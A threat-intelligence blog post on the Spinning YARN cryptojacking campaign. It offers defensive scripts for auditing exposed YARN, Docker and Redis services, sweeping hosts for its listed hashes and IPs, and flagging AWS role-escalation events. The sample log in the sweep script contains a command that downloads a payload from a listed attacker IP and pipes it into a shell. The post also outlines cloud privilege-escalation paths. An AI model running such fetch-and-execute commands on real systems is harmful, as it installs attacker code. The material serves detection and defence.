
Cyber Pandemonium Unleashed: Tracing the Trail of Sophisticated Linux Malware Campaign
Cado Security's researchers uncovered Spinning YARN, a sophisticated Linux malware campaign focused on misconfigured Linux servers running popular cloud-hosted services. The cryptojacking campaign targets Apache Hadoop YARN, Atlassian Confluence, Docker and Redis deployments whose misconfiguration lets an unauthenticated client in: YARN ResourceManager and Docker Engine APIs exposed without authentication, Redis instances that accept connections without AUTH, and Confluence servers left unpatched against CVE-2022-26134. Each foothold is used to deliver new and unique malicious payloads.
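The campaign only needs these services to answer without credentials, so the most useful first check is whether your own hosts do. The audit script below is an added example, not code from the SOCRadar or Cado write-ups: it probes the default ports (an assumption) for an unauthenticated YARN ResourceManager REST API, an unauthenticated Docker Engine API and a Redis instance that answers PING without AUTH, and it includes a version check against the CVE-2022-26134 fixed builds. The fixed-version table is reproduced from the Atlassian advisory as remembered here and should be confirmed against it; the sample responses used by the classifiers are constructed. Run it only against hosts you are authorised to test.

```python
"""Exposure audit for the services the Spinning YARN campaign abuses.
Added example, not code from the SOCRadar or Cado write-ups. Default ports and
the responses used by the classifiers are assumptions; run it only against hosts
you are authorised to test."""
import json
import socket
import sys
import urllib.error
import urllib.request

TIMEOUT = 5

# Fixed builds from Atlassian's CVE-2022-26134 advisory (assumption: reproduced from
# memory; confirm against the advisory before relying on this table).
CONFLUENCE_FIXED = {
    (7, 4): (7, 4, 17), (7, 13): (7, 13, 7), (7, 14): (7, 14, 3), (7, 15): (7, 15, 2),
    (7, 16): (7, 16, 4), (7, 17): (7, 17, 4), (7, 18): (7, 18, 1),
}


def parse_version(text):
    return tuple(int(part) for part in text.strip().split("."))


def confluence_vulnerable(version):
    """True when `version` predates the CVE-2022-26134 fix for its branch. Branches that
    never received a fixed build (1.3.0 through 7.12.x) must move to a fixed branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch in CONFLUENCE_FIXED:
        return v < CONFLUENCE_FIXED[branch]
    return branch <= (7, 18)  # 7.19 and later were released after the fix


def classify_yarn(status, body):
    """A 200 with clusterInfo from /ws/v1/cluster/info without credentials means the
    ResourceManager REST API, including application submission, is open to anyone."""
    if status != 200:
        return "not-exposed"
    try:
        return "exposed" if "clusterInfo" in json.loads(body) else "unknown"
    except (ValueError, TypeError):
        return "unknown"


def classify_docker(status, body):
    """/version answering on TCP 2375 means containers can be created remotely without
    authentication, which is how the campaign gets code onto Docker hosts."""
    if status != 200:
        return "not-exposed"
    try:
        return "exposed" if "ApiVersion" in json.loads(body) else "unknown"
    except (ValueError, TypeError):
        return "unknown"


def classify_redis(reply):
    """Redis answers PING with +PONG only when no AUTH is required and protected mode
    is not blocking the client."""
    if reply.startswith("+PONG"):
        return "exposed"
    if reply.startswith("-NOAUTH") or reply.startswith("-DENIED"):
        return "protected"
    return "unknown"


def http_get(url):
    """Return (status, body); status 0 means the port did not answer at all."""
    try:
        with urllib.request.urlopen(url, timeout=TIMEOUT) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # e.g. 401 from a Kerberos-protected YARN
        return err.code, ""
    except OSError:  # URLError, refused connection, timeout
        return 0, ""


def redis_ping(host, port=6379):
    try:
        with socket.create_connection((host, port), timeout=TIMEOUT) as sock:
            sock.sendall(b"PING\r\n")
            return sock.recv(256).decode("utf-8", "replace")
    except OSError:
        return ""


def audit(host):
    return {
        "yarn": classify_yarn(*http_get(f"http://{host}:8088/ws/v1/cluster/info")),
        "docker": classify_docker(*http_get(f"http://{host}:2375/version")),
        "redis": classify_redis(redis_ping(host)),
    }


if __name__ == "__main__":
    for target in sys.argv[1:] or ["127.0.0.1"]:
        print(target, audit(target))
```

The YARN probe deliberately stops at a read-only GET: a 200 from /ws/v1/cluster/info without credentials is enough to know that the application-submission endpoints the campaign uses are equally open, without submitting anything. A Confluence version string for `confluence_vulnerable()` can be read from the server's own login page footer or from its REST API once you are authenticated.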
Indicators of Compromise
Hashes (13)
(The source runs the 13 hashes together as one hexadecimal string. Splitting it at SHA-256 length, 64 characters, yields the 11 values below plus a trailing fragment, 6af01a948caf8b87, which is not a complete hash as extracted and is kept as-is.)
079b726261c92055c6914a85cc23ef6d7a68fcbf64d8f887e33781bb814eaefa
98dd64368da9a8d38bd9da4a76f04a23b6eb9de505b667fc6c59cbced066b321
8937c16d251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7de
dface8e5c9932643017bafa71eedea4ddd0ae974d5722087135833ed394f20e2
36d845db8c398e27afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf
2de9fe975cae50c40c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe
67d2a9efe93d7ce5d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e
3a6635bbaeb7eb6ed45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd3
83296b6bd1e3ddb55a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af
9bc1a0937841d174e71975a72f93b134476c8183051fee827ea509b4e888e19d
551a8ced6087e15c0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d
6af01a948caf8b87
IPv4 (4)
209.141.37.110
107.189.31.172
47.96.69.71
114.114.114.114
(Note: 114.114.114.114 is a public DNS resolver (114DNS). Cryptojacking scripts of this kind commonly write it into /etc/resolv.conf, so it is best used as a host-configuration indicator rather than as a network block-list entry, where it would also flag legitimate clients of that resolver.)
CVEs (1)
CVE-2022-26134
Notes
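Sweeping a host for the indicators listed above takes three checks: file digests against the hash set, log text against the IPv4 list, and the resolver configuration against 114.114.114.114. The script below is an added example rather than SOCRadar tooling. Its hash set is the page's list split at SHA-256 length; the log excerpt and resolv.conf text in the demo are constructed; that the campaign's scripts write 114.114.114.114 into /etc/resolv.conf is an assumption noted in the code.

```python
"""Sweep a host for the Spinning YARN indicators listed on this page.
Added example, not SOCRadar tooling. The hash set is the page's list split at
SHA-256 length; the log excerpt and resolv.conf text below are constructed."""
import hashlib
import os
import re
import tempfile

IOC_SHA256 = set("""
079b726261c92055c6914a85cc23ef6d7a68fcbf64d8f887e33781bb814eaefa
98dd64368da9a8d38bd9da4a76f04a23b6eb9de505b667fc6c59cbced066b321
8937c16d251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7de
dface8e5c9932643017bafa71eedea4ddd0ae974d5722087135833ed394f20e2
36d845db8c398e27afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf
2de9fe975cae50c40c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe
67d2a9efe93d7ce5d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e
3a6635bbaeb7eb6ed45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd3
83296b6bd1e3ddb55a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af
9bc1a0937841d174e71975a72f93b134476c8183051fee827ea509b4e888e19d
551a8ced6087e15c0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d
""".split())

IOC_IPV4 = {"209.141.37.110", "107.189.31.172", "47.96.69.71", "114.114.114.114"}

# 114.114.114.114 is a public DNS resolver; cryptojacking scripts of this kind commonly
# write it into /etc/resolv.conf (assumption for this campaign), so the useful check is
# the resolver configuration, not generic traffic to the address.
TAMPERED_RESOLVER = "114.114.114.114"

# Whole-token match: "147.96.69.71" must not count as a hit for 47.96.69.71.
_IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def sha256_of(path, chunk=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def sweep_files(root, hashes=IOC_SHA256):
    """Return [(path, sha256)] for regular files under root whose digest is an IoC."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                digest = sha256_of(path)
            except OSError:
                continue  # unreadable or vanished; a production sweep would log this
            if digest in hashes:
                hits.append((path, digest))
    return hits


def find_ips(text, ips=IOC_IPV4):
    """Return [(line_no, ip)] for every line carrying an IoC address."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in _IPV4_RE.finditer(line):
            if match.group(1) in ips:
                hits.append((line_no, match.group(1)))
    return hits


def resolver_tampered(resolv_conf_text):
    """True when an uncommented nameserver line points at the attacker-preferred resolver."""
    for line in resolv_conf_text.splitlines():
        fields = line.split()
        if fields and not fields[0].startswith("#") and fields[:2] == ["nameserver", TAMPERED_RESOLVER]:
            return True
    return False


# Constructed syslog excerpt: one cron line fetching from a listed address, and a
# redis line with a look-alike address that must not match.
SAMPLE_LOG = """\
Mar  6 10:12:01 node1 sshd[2201]: Accepted publickey for deploy from 10.0.0.5 port 51244
Mar  6 10:12:09 node1 CRON[2310]: (root) CMD (curl -s http://209.141.37.110/payload.sh | sh)
Mar  6 10:12:15 node1 kernel: docker0: port 1(veth0) entered forwarding state
Mar  6 10:12:20 node1 redis[1450]: Client connected from 147.96.69.71
"""

SAMPLE_RESOLV = "# constructed\nnameserver 114.114.114.114\nnameserver 8.8.8.8\n"


def demo():
    """Run the sweep on constructed data: a benign file, the log and resolv.conf above."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "benign.sh")
        content = b"#!/bin/sh\necho hello\n"
        with open(path, "wb") as fh:
            fh.write(content)
        digest_ok = sha256_of(path) == hashlib.sha256(content).hexdigest()
        file_hits = sweep_files(root)
    return file_hits, find_ips(SAMPLE_LOG), resolver_tampered(SAMPLE_RESOLV), digest_ok


if __name__ == "__main__":
    print(demo())
```

On a real host, point `sweep_files()` at the places a dropper leaves files (/tmp, /var/tmp, /dev/shm, cron directories and the home directory of the service account) and feed `find_ips()` the cron, shell-history and proxy logs; the whole-token regex matters because octet prefixes of the listed addresses occur in unrelated traffic.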
<div><b>CONCLUSIONS</b></div><div>The increasing sophistication of malware campaigns targeting misconfigured Linux servers in cloud services underlines the critical need for strong cybersecurity defenses. By exploiting misconfigurations and unpatched vulnerabilities in widely used platforms such as Apache Hadoop YARN, Docker, Confluence, and Redis, these campaigns show how quickly attackers adapt to whatever exposed infrastructure they find. A holistic approach is essential to defend against such threats: comprehensive system audits, stringent update and patch management, thorough monitoring and logging, API security (the unauthenticated YARN, Docker and Redis APIs are this campaign's entry points), and security technologies that can identify and neutralize emerging threats.</div><div><br></div><div>When strengthening an organization's cybersecurity framework, it is also crucial to educate staff about potential cyber threats, create effective backup and recovery mechanisms, and enforce strict access controls. This is where SOCRadar Labs comes in. Our platform offers a comprehensive suite of tools and services for detecting, analyzing and mitigating cyber threats. Through its threat intelligence and analysis capabilities, SOCRadar Labs gives customers early warning alerts, rigorous incident analysis, and pragmatic, actionable recommendations designed to prevent or mitigate the impact of cyberattacks, so that organizations can proactively strengthen their security posture against sophisticated malware campaigns.</div><div><br></div><div>By leveraging the resources and expertise provided by SOCRadar Labs, organizations can significantly strengthen their resilience against the ever-evolving threat landscape and protect the security and availability of their cloud-based resources. Combining a proactive security strategy with SOCRadar Labs' threat intelligence platform is the essence of navigating modern cybersecurity: by staying alert, prepared, and current with the latest SOCRadar solutions, organizations can defend themselves more effectively against the complex and evolving tactics of attackers. At SOCRadar, our commitment is to enable customers not only to respond to threats but to stay ahead of them and protect their digital environments on this ever-changing frontier.</div>
Mitigation
<span id="docs-internal-guid-b393d0f4-7fff-a3ac-6a6d-9776032395f2">
<p><b>MITIGATIONS</b></p>
<p>The entry below is reproduced from the MITRE ATT&amp;CK sub-technique it links to (T1548.005, Temporary Elevated Cloud Access) and covers the cloud-identity side of a compromised cloud-hosted server; host-level measures for Linux follow it.</p>
<p><b>Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access</b></p>
<p>Other sub-techniques of Abuse Elevation Control Mechanism (5)</p>
<table>
<thead><tr><th>ID</th><th>Name</th></tr></thead>
<tbody>
<tr><td><a href="https://attack.mitre.org/techniques/T1548/001/">T1548.001</a></td><td><a href="https://attack.mitre.org/techniques/T1548/001/">Setuid and Setgid</a></td></tr>
<tr><td><a href="https://attack.mitre.org/techniques/T1548/002/">T1548.002</a></td><td><a href="https://attack.mitre.org/techniques/T1548/002/">Bypass User Account Control</a></td></tr>
<tr><td><a href="https://attack.mitre.org/techniques/T1548/003/">T1548.003</a></td><td><a href="https://attack.mitre.org/techniques/T1548/003/">Sudo and Sudo Caching</a></td></tr>
<tr><td><a href="https://attack.mitre.org/techniques/T1548/004/">T1548.004</a></td><td><a href="https://attack.mitre.org/techniques/T1548/004/">Elevated Execution with Prompt</a></td></tr>
<tr><td>T1548.005</td><td>Temporary Elevated Cloud Access</td></tr>
</tbody>
</table>
<p>Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.</p>
<p>Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.[1][2]</p>
<p>Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.[3] In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.[4]</p>
<p>Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.[5][3]</p>
<p>While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.[6][7]</p>
<p>Note: this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.[8]</p>
<h2>Mitigations</h2>
<table>
<thead><tr><th>ID</th><th>Mitigation</th><th>Description</th></tr></thead>
<tbody>
<tr><td><a href="https://attack.mitre.org/mitigations/M1018">M1018</a></td><td><a href="https://attack.mitre.org/mitigations/M1018">User Account Management</a></td><td>Limit the privileges of cloud accounts to assume, create, or impersonate additional roles, policies, and permissions to only those required. Where just-in-time access is enabled, consider requiring manual approval for temporary elevation of privileges.</td></tr>
</tbody>
</table>
<h2>Detection</h2>
<table>
<thead><tr><th>ID</th><th>Data Source</th><th>Data Component</th><th>Detects</th></tr></thead>
<tbody>
<tr><td><a href="https://attack.mitre.org/datasources/DS0002">DS0002</a></td><td><a href="https://attack.mitre.org/datasources/DS0002">User Account</a></td><td><a href="https://attack.mitre.org/datasources/DS0002/#User%20Account%20Modification">User Account Modification</a></td><td>Log API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.</td></tr>
</tbody>
</table>
<ul>
<li>Linux malware mitigation techniques are the methods used to protect Linux systems from malicious software. Some of them are:
<ul>
<li>Using antivirus programs: several antivirus and endpoint-protection products are available for Linux. They detect and remove known malicious software by signature or by behavioural analysis.</li>
<li>Applying security updates: Linux distributions and the applications running on them regularly release updates that fix security vulnerabilities. Installing them promptly, automatically or manually, closes the holes campaigns like this one rely on; for Confluence that means a build fixed against CVE-2022-26134.</li>
<li>Setting secure passwords and permissions: long, complex, unique passwords and least-privilege permissions for user accounts, files and services limit what malicious software can reach. For the services in this campaign that means requiring authentication on Redis and on the YARN and Docker APIs instead of exposing them to anonymous clients, and granting permissions only to those who need them.</li>
<li>Not downloading files from untrusted sources: malicious software frequently arrives as a file fetched from an untrusted or suspicious source, so verify the reliability of the source before downloading or running anything.</li>
<li>Using tools like a firewall and SELinux: firewall tools such as iptables, nftables, ufw and firewalld control network traffic and block unauthorized access. In particular, the management ports this campaign probes (the YARN ResourceManager on 8088, the Docker API on 2375, Redis on 6379 and Confluence on 8090) should be reachable only from trusted networks. SELinux reduces the impact of malicious software that does get in by confining files, processes and users to a security policy.</li>
</ul>
</li>
<li>These techniques reduce the risk but do not provide absolute protection. Regular scanning, backups and configuration review remain necessary, and administrators should stay aware of how current malware behaves.</li>
</ul>
</span>
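The Detection row for T1548.005 above asks for two things: log the API calls that assume, create or modify roles, and review them against what was expected. The script below is an added example, not MITRE's or SOCRadar's code, that applies that logic to CloudTrail-style records: it flags refused AssumeRole calls, role sessions that assume a further role (chaining), AssumeRole pairs outside an expected baseline, and role-policy or trust-policy changes by principals outside an admin allowlist. The records, the account ID, the principals and the role names are constructed placeholders.

```python
"""Flag temporary-elevation abuse (ATT&CK T1548.005) in CloudTrail-style records.
Added example, not MITRE's or SOCRadar's code. The records, account ID, principals
and role names below are constructed placeholders."""
import json

# (eventSource, eventName) pairs the Detection row asks to log: assuming roles, and
# changing what a role can do or who may assume it.
ASSUME = ("sts.amazonaws.com", "AssumeRole")
ROLE_CHANGES = {
    ("iam.amazonaws.com", "AttachRolePolicy"),
    ("iam.amazonaws.com", "PutRolePolicy"),
    ("iam.amazonaws.com", "UpdateAssumeRolePolicy"),
    ("iam.amazonaws.com", "CreateRole"),
}


def load_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyse(records, expected_assumptions, role_admins):
    """Return (eventTime, kind, actor, target) findings.

    expected_assumptions: {(actor_arn, role_arn)} pairs that are normal in this account.
    role_admins: principals allowed to change role policies and trust relationships."""
    findings = []
    for rec in records:
        key = (rec.get("eventSource"), rec.get("eventName"))
        identity = rec.get("userIdentity") or {}
        actor = identity.get("arn", "?")
        params = rec.get("requestParameters") or {}
        when = rec.get("eventTime", "?")
        if key == ASSUME:
            target = params.get("roleArn", "?")
            if rec.get("errorCode"):
                # A refused AssumeRole is the cheapest signal of someone probing for roles.
                findings.append((when, "denied-assume-role", actor, target))
            elif identity.get("type") == "AssumedRole":
                # A role session assuming a further role: review for escalation chains.
                findings.append((when, "role-chaining", actor, target))
            elif (actor, target) not in expected_assumptions:
                findings.append((when, "unexpected-assume-role", actor, target))
        elif key in ROLE_CHANGES and actor not in role_admins:
            findings.append((when, "role-permission-change", actor, params.get("roleName", "?")))
    return findings


# Constructed CloudTrail-style records (JSON Lines), one normal deploy, one probe that is
# refused, a policy change by a non-admin, a chained assumption, an admin change, and noise.
SAMPLE_EVENTS = r'''
{"eventTime": "2024-03-06T10:00:01Z", "eventSource": "sts.amazonaws.com", "eventName": "AssumeRole", "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/Deploy", "roleSessionName": "alice-deploy"}}
{"eventTime": "2024-03-06T10:01:15Z", "eventSource": "sts.amazonaws.com", "eventName": "AssumeRole", "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/bob"}, "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/Admin", "roleSessionName": "bob"}, "errorCode": "AccessDenied"}
{"eventTime": "2024-03-06T10:02:40Z", "eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy", "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/bob"}, "requestParameters": {"roleName": "Deploy", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}}
{"eventTime": "2024-03-06T10:03:05Z", "eventSource": "sts.amazonaws.com", "eventName": "AssumeRole", "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::123456789012:assumed-role/Deploy/bob"}, "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/Admin", "roleSessionName": "bob"}}
{"eventTime": "2024-03-06T10:04:00Z", "eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy", "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"roleName": "Deploy", "policyArn": "arn:aws:iam::123456789012:policy/DeployReadOnly"}}
{"eventTime": "2024-03-06T10:05:30Z", "eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances", "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {}}
'''

ACCOUNT = "123456789012"
EXPECTED = {(f"arn:aws:iam::{ACCOUNT}:user/alice", f"arn:aws:iam::{ACCOUNT}:role/Deploy")}
ADMINS = {f"arn:aws:iam::{ACCOUNT}:user/alice"}


def run_demo():
    return analyse(load_jsonl(SAMPLE_EVENTS), EXPECTED, ADMINS)


if __name__ == "__main__":
    for finding in run_demo():
        print(*finding)
```

The baseline sets are the review the Detection row calls for, and they need care: EC2 instance profiles and CI runners appear as AssumedRole sessions and will trigger the role-chaining rule, so seed `EXPECTED` and `ADMINS` from a known-clean period before alerting on the output. Note that PassRole itself does not produce a CloudTrail event; it is evaluated inside the call that attaches the role to a resource, so that part of the technique must be watched on the service calls (for example instance or function creation) rather than on STS.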